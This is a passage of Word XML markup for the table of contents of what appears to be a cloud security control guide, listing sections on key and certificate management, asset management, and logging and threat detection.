              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Manage cryptographic infrastructure</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449508 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>73</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3476925D" w14:textId="0F33C808" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449509" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.3.1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>DP-6: Use a secure key management process</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449509 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>73</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="43D9DC04" w14:textId="631D45F1" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449510" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.3.2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>DP-7: Use a secure certificate management process</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449510 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>77</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="17DA6451" w14:textId="2CE58EB0" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449511" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.3.3.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>DP-8: Ensure security of key and certificate repository</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449511 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>80</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="30472941" w14:textId="732182EF" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="480"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449512" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Asset Management</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449512 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>84</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="35067470" w14:textId="584FFD5D" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449513" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Asset inventory and visibility</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449513 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>84</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="53ADADA6" w14:textId="1435A258" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449514" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.1.1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>AM-1: Track asset inventory and their risks</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449514 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>84</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="48EBA5A7" w14:textId="2246550F" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449515" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Service approval and application control</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449515 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>91</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="133EC42C" w14:textId="6B9A7934" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449516" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.2.1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>AM-2: Use only approved services</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449516 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>91</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="69F890EB" w14:textId="53338EEF" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449517" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.3.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Asset lifecycle and access management</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449517 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>94</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7FDC6567" w14:textId="0D09CCC8" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449518" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.3.1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>AM-3: Ensure security of asset lifecycle management</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449518 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>94</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="452B1F0C" w14:textId="7E756ED8" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449519" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.3.2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>AM-4: Limit access to asset management</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449519 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>98</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2252E84D" w14:textId="43ABEB7E" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449520" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.4.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Service approval and application control</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449520 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>101</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="61A69CC0" w14:textId="0E0794CC" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449521" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.4.1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>AM-5: Use only approved applications in virtual machine</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449521 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>101</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4FD8563A" w14:textId="706CF8D9" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="480"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449522" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Logging and Threat Detection</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
